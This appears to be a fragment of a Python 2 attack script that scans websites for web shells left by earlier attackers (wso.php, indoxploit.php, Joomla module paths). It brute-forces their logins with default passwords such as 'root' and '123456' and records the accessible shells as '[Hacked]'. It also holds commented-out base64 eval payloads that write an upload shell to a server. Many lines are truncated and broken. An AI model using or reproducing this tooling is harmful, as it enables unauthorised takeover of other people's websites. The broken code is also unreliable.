if 'Index of' in files_check and '.php' in files_check :
shells = []
if re.findall(pattern_php,files_check):
shells = re.findall(pattern_php,files_check)
for shell in shells:
sh_check = requests.get(SH10_O+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
pdf_check = requests.get(SH11_O,timeout=15).content
if 'Index of' in pdf_check and '.php' in pdf_check :
shells = []
if re.findall(pattern_php,pdf_check):
shells = re.findall(pattern_php,pdf_check)
for shell in shells:
sh_check = requests.get(SH11_O+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
docs_check = requests.get(SH12_O,timeout=15).content
if 'Index of' in docs_check and '.php' in docs_check :
shells = []
if re.findall(pattern_php,docs_check):
shells = re.findall(pattern_php,docs_check)
for shell in shells:
sh_check = requests.get(SH12_O+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
site_check = requests.get(site+'/',timeout=15).content
if ' type="file"' in site_check or ' type=\'file\'' in site_check or ' type= "file"' in site_check or ' type= \'file\'' in site_check or ' type = "file"' in site_check or ' type = \'file\'' in site_check or ' type ="file"' in site_check or ' type =\'file\'' in site_check or ' type=file' in site_check or ' type =file' in site_check or ' type= file' in site_check or ' type = file' in site_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('mylogin.txt', mode='a') as ccc:
ccc.write(site+'/ [Register or Contact]
else :
up_check = requests.get(SH13_O,timeout=15).content
if ' type="file"' in up_check or ' type=\'file\'' in up_check or ' type= "file"' in up_check or ' type= \'file\'' in up_check or ' type = "file"' in up_check or ' type = \'file\'' in up_check or ' type ="file"' in up_check or ' type =\'file\'' in up_check or ' type=file' in up_check or ' type =file' in up_check or ' type= file' in up_check or ' type = file' in up_check or 'Upload</a> ]</li><li>[' in up_check or 'upload</a><li><a>Sym' in up_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('UPloaders.txt', mode='a') as cc:
cc.write(SH13_O+' [Hacked]
else :
upload_check = requests.get(SH14_O,timeout=15).content
if ' type="file"' in upload_check or ' type=\'file\'' in upload_check or ' type= "file"' in upload_check or ' type= \'file\'' in upload_check or ' type = "file"' in upload_check or ' type = \'file\'' in upload_check or ' type ="file"' in upload_check or ' type =\'file\'' in upload_check or ' type=file' in upload_check or ' type =file' in upload_check or ' type= file' in upload_check or ' type = file' in upload_check or 'Upload</a> ]</li><li>[' in upload_check or 'upload</a><li><a>Sym' in upload_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('UPloaders.txt', mode='a') as cc:
cc.write(SH14_O+' [Hacked]
else :
shell_check = requests.get(SH15_O,timeout=15).content
if ' type="file"' in shell_check or ' type=\'file\'' in shell_check or ' type= "file"' in shell_check or ' type= \'file\'' in shell_check or ' type = "file"' in shell_check or ' type = \'file\'' in shell_check or ' type ="file"' in shell_check or ' type =\'file\'' in shell_check or ' type=file' in shell_check or ' type =file' in shell_check or ' type= file' in shell_check or ' type = file' in shell_check or 'Upload</a> ]</li><li>[' in shell_check or 'upload</a><li><a>Sym' in shell_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
except :
print ' -| '+site +' --> {}[Failed]'.format(fr)
def Joomla2(site):
try :
site = URL(site)
SH1_J2 = site+'/modules/mod_simplefileuploadv1.3/elements/Clean.php'
SH2_J2 = site+'/modules/mod_simplefileuploadv1.3/elements/udd.php'
SH3_J2 = site+'/libraries/joomla/css.php'
SH4_J2 = site+'/libraries/joomla/jmails.php?u'
SH5_J2 = site+'/libraries/joomla/jmail.php?u'
SH6_J2 = site+'/images/vuln.php'
SH7_J2 = site+'/tmp/vuln.php'
SH8_J2 = site+'/XxX.php'
SH9_J2 = site+'/Marvins.php'
SH10_J2 = site+'/rxr.php?rxr'
SH11_J2 = site+'/modules/modules/modules.php'
SH12_J2 = site+'/olux.php'
SH13_J2 = site+'/indoxploit.php'
SH14_J2 = site+'/error.php'
SH15_J2 = site+'/RxR.php'
SH16_J2 = site+'/components/com_b2jcontact/izoc.php'
SH17_J2 = site+'/V3.php'
SH18_J2 = site+'/V5.php'
SH19_J2 = site+'/wso.php'
try :
wso_check = requests.get(SH19_J2,timeout=15).content
modules_check = requests.get(SH11_J2,timeout=15).content
except :
#modules_upload2 = {'itongtong':'eval(base64_decode("JGZvPWZvcGVuKCJGMHgucGhwIiwidyIpOwpmd3JpdGUoJGZvLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21WamFHOGdJa2hoWTJ0bFpDQkNlU0JCYm05dWVXMXZkWE5HYjNoY2JpSTdEUXA3RFFva2MyRjNNU0E5SUNSZlJrbE1SVk5iSjJacGJHVW5YVnNuZEcxd1gyNWhiV1VuWFRzTkNpUnpZWGN5SUQwZ0pGOUdTVXhGVTFzblptbHNaU2RkV3lkdVlXMWxKMTA3RFFwbFkyaHZJQ0k4Wm05eWJTQnRaWFJvYjJROUoxQlBVMVFuSUdWdVkzUjVjR1U5SjIxMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFblBnMEtQR2x1Y0hWMElIUjVjR1U5SjJacGJHVW5ibUZ0WlQwblptbHNaU2NnTHo0TkNqeHBibkIxZENCMGVYQmxQU2R6ZFdKdGFYUW5JSFpoYkhWbFBTZDFjR3h2WVdRZ2MyaGxiR3duSUM4K0RRbzhMMlp2Y20wK0lqc05DbTF2ZG1WZmRYQnNiMkZrWldSZlptbHNaU2drYzJGM01Td2tjMkYzTWlrN0RRcDlEUW8vUGc9PScpKTs="));'}
#modules_upload3 = {'itongtong':'eval(base64_decode("JGZvPWZvcGVuKCRfU0VSVkVSWyJET0NVTUVOVF9ST09UIl0uIi9pbWFnZXMvRjB4LnBocCIsInciKTsKZndyaXRlKCRmbyxiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtVmphRzhnSWtoaFkydGxaQ0JDZVNCQmJtOXVlVzF2ZFhOR2IzaGNiaUk3RFFwN0RRb2tjMkYzTVNBOUlDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhUc05DaVJ6WVhjeUlEMGdKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwN0RRcGxZMmh2SUNJOFptOXliU0J0WlhSb2IyUTlKMUJQVTFRbklHVnVZM1I1Y0dVOUoyMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRW5QZzBLUEdsdWNIVjBJSFI1Y0dVOUoyWnBiR1VuYm1GdFpUMG5abWxzWlNjZ0x6NE5DanhwYm5CMWRDQjBlWEJsUFNkemRXSnRhWFFuSUhaaGJIVmxQU2QxY0d4dllXUWdjMmhsYkd3bklDOCtEUW84TDJadmNtMCtJanNOQ20xdmRtVmZkWEJzYjJGa1pXUmZabWxzWlNna2MyRjNNU3drYzJGM01pazdEUXA5RFFvL1BnPT0nKSk7"));'}
if 'Mini shell' in requests.get(SH1_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[SimpleFileUpload]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Shell Uploader' in requests.get(SH2_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[SimpleFileUpload]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'walex says Fuck Off Kids:' in requests.get(SH3_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[RCE]'.format(fg)
if 'BlesseD MAILER 2014' in requests.get(SH4_J2,timeout=15).content :
if 'w4l3XzY3 Mailer' in requests.get(SH5_J2,timeout=15).content :
with open('Shells.txt', mode='a') as d:
d.write(SH3_J2+' | '+SH4_J2+' | '+SH5_J2+'
else :
with open('Shells.txt', mode='a') as d:
d.write(SH3_J2+' | '+SH4_J2+'
else :
with open('Shells.txt', mode='a') as d:
elif 'BlesseD MAILER 2014' in requests.get(SH4_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[RCE]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'w4l3XzY3 Mailer' in requests.get(SH5_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[RCE]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Windows' in wso_check and 'Upload file:' in wso_check :
